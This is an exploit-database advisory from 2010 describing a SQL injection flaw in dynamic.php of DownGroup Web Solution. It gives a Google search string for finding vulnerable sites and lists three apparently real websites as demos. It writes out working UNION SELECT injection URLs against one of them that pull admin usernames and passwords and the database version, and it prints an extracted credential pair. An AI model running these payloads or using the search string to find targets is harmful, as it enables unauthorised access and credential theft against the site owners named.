DownGroup Web Solution suffers from a remote SQL injection vulnerability in dynamic.php.
d4fb75c17b5e0dfa3c71e97dcdf3edaad907a383676798c96420eb97ace333b7
================================================================
DownGroup Web Solution <= (dynamic.php) SQL Injection Vulnerability
================================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
3 3
3 _ __ __ ________ __ __ 3
7 /' \ /'__`\ /'__`\ /\_____ \ /\ \/\ \ 7
1 /\_, \/\_\L\ \ /\_\L\ \\/___//'/' \_\ \ \ \____ 1
3 \/_/\ \/_/_\_<_\/_/_\_<_ /' /' /'_` \ \ '__`\ 3
3 \ \ \/\ \L\ \ /\ \L\ \ /' /' /\ \L\ \ \ \L\ \ 3
7 \ \_\ \____/ \ \____//\_/ \ \___,_\ \_,__/ 7
1 \/_/\/___/ \/___/ \// \/__,_ /\/___/ 1
3 >> Exploit database separated by exploit 3
3 type (local, remote, DoS, etc.) 3
7 7
1 [+] Site : 1337db.com 1
3 [+] Support e-mail : submit[at]1337db.com 3
3 3
7 ############################################ 7
1 I'm KnocKout 1337 Member from 1337 DataBase 1
3 ############################################ 3
3 3
7-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-7
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
[~] HomePage : http://h4x0resec.blogspot.com
[~] Reference : http://h4x0resec.blogspot.com
[~] Special Thanks : DaiMon,BARCOD3 and H4X0RE SECURITY
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : DownGroup Web Solution
|~Price : N/A
|~Version : N/A
|~Software: http://www.dowgroup.com
|~Vulnerability Style : SQL Injection
|~Vulnerability Dir : /
|~sqL : MysqL
|~Google Keyword : Powered by www.dowgroup.com
|[~]Date : "26.11.2010"
|[~]Tested on : (L):Vista (R):Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_mono/2.4 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.25
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Demos:
http://www.obaid.ae
http://www.5-cont.com
http://www.360mediadubai.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============================================================
|{~~~~~~~~ Explotation| dynamic.php SQL Injection~~~~~~~~~~~}|
http://$Site/$path/dynamic.php?id=8 {SQL Injection}
Ex; http://www.360mediadubai.com
[~] SQL Injecting
http://www.360mediadubai.com/dynamic.php?id=-8/**/union/**/select%201,2,concat%28user_name,0x3a,password%29,4,5/**/from/**/admin
[~] MySQL writes : 360user_end:pass3421toadmin
[~] SQL Injecting
http://www.360mediadubai.com/dynamic.php?id=-8/**/union/**/select%201,2,version%28%29,4,5--
[~] MySQL writes : 5.0.91-community
To your continue..
=============================================================
gOODLuck;)